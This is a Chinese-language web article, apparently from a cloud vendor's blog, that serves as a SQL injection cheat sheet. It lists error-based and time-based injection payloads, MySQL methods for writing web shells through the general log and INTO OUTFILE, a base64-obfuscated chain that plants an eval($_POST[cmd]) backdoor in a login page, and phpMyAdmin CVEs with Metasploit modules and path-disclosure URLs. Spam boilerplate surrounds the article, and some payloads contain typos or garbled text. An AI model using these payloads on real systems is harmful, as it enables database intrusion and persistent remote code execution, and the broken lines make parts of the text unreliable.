91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SQL注入語法有哪些

發布時間:2022-01-19 10:42:18 來源:億速云 閱讀:216 作者:小新 欄目:網絡管理

這篇文章主要介紹了SQL注入語法有哪些,具有一定借鑒價值,感興趣的朋友可以參考下,希望大家閱讀完這篇文章之后大有收獲,下面讓小編帶著大家一起了解一下。

僅供參考學習使用。

SQL注入語法

報錯注入

updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

extractvalue(1,concat(0x7e,(select database()),0x7e),1)--+

select count(*) from information_schema.tabeles group by concat((select database(),floor(rand(0)*2)

select substr(version(),1,1)='X'

select substring(version(),1,1)='X'

列名重復報錯

select * from (select name_const(version(),1))a;

select * from (select name_const((version()),1),name_const((select database()),1))a;

select * from (select * from users a join users b)c;

數據溢出報錯

select (select(!x-~0) from (select(select user())x)a);

select ~0+!(select * from (select user())x);

幾何函數報錯

multipoint((select * from(select * from(select user())a)b));

case when 語句

select * from datadatabase() case id when 1 else 2 end

時間注入

if right((select database()),a,b)>'s' sleep(5)

if assic(substr((select database()),a,b))=98 sleep(5)

if assic(substr((select database()) from a to b))=98 sleep(5)

if ord(mid((select database()),a,b))=98 sleep(5)
通過日志寫shell
利用條件

已知物理路徑,目錄可寫,root權限。

查看配置

show variables like '%general';

開啟general log模式

set global general_log=on;

設置日志寫shell地址*

set global general_log_file="/var/www/html/log.php";

寫入shell

select "<?php phpinfo();>";

通過into outfile寫shell

利用條件

已知物理路徑,目錄可寫

select '<?php phpinfo();>' into outfile ‘/var/www/html/1.php'

通過導出表寫入shell

use mysql;

create table shell(shell1 text not null);

insert into shell(cmd1) values('<?php phpinfo();>');

select cmd1 from a into outfile '/var/www/html/1.php';

mysql from_base64函數利用

利用base64編碼來加密,然后使用自定義變量接到,在使用prepare和EXECUTE來執行語句,完成日志寫shell的操作。

set

set 用戶定義一個變量,變量里面是sql可以執行的語句。

SQL注入語法有哪些

prepare

prepare name from value;

prepare 語句用于預備一個語句,并指定名稱name,然后引用改語句。

SQL注入語法有哪些

execute

execute 語句用于執行預備的語句。

SQL注入語法有哪些

聯合起來利用

set @sql1 = (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZz1vbg=='));
/*set global general_log=on*/
PREPARE name from @sql;
EXECUTE name;
set @sql2= (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZ19maWxlPSJDOlxcTVlPQVxcd2Vicm$9$vdFxcbG9naW4ucGhwIg=='));
/*set global general_log_file="C:\\MYOA\\webroot\\login.php"*/
PREPARE name from sql2;
EXECUTE name;
select "<?php eval($_POST[cmd]); ?>";
set @sql3 := (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZyA9IG9mZg=='));
/*set global general_log = off*/
PREPARE name from @sql3;
EXECUTE name;

phpmyadmin 漏洞合集

phpmyadmin存在pregreplaceeval漏洞

影響版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 CVE-2013-3238

phpmyadmin存在serversync.php后門漏洞

影響版本 phpmyadmin v3.5.2.2

msf利用模塊 : exploit/multi/http/phpmyadmin3522_backdoor CVE-2012-5159

phpmyadmin 配置文件/config/config.inc.php存在命令執行漏洞

影響版本: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1

msf利用模塊:exploit/unix/webapp/phpmyadmin_config CVE-2009-1151

登錄處漏洞

利用方法:用戶名處寫入'localhost'@'@"

影響版本:2.113/2.114

php爆絕對路徑

phpMyAdmin/libraries/selectlang.lib.php

phpMyAdmin/darkblueorange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

感謝你能夠認真閱讀完這篇文章,希望小編分享的“SQL注入語法有哪些”這篇文章對大家有幫助,同時也希望大家多多支持億速云,關注億速云行業資訊頻道,更多相關知識等著你來學習!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

sql
AI

仲巴县| 资讯| 云霄县| 广西| 墨江| 卓尼县| 荔波县| 全南县| 牡丹江市| 安新县| 思茅市| 云安县| 通州市| 西乡县| 永年县| 南平市| 武鸣县| 苍梧县| 博客| 原平市| 德安县| 呼图壁县| 库尔勒市| 和静县| 河北省| 平顺县| 唐山市| 库车县| 武胜县| 姜堰市| 军事| 南溪县| 惠来县| 无极县| 万源市| 禹城市| 连南| 丹东市| 云阳县| 新建县| 铅山县|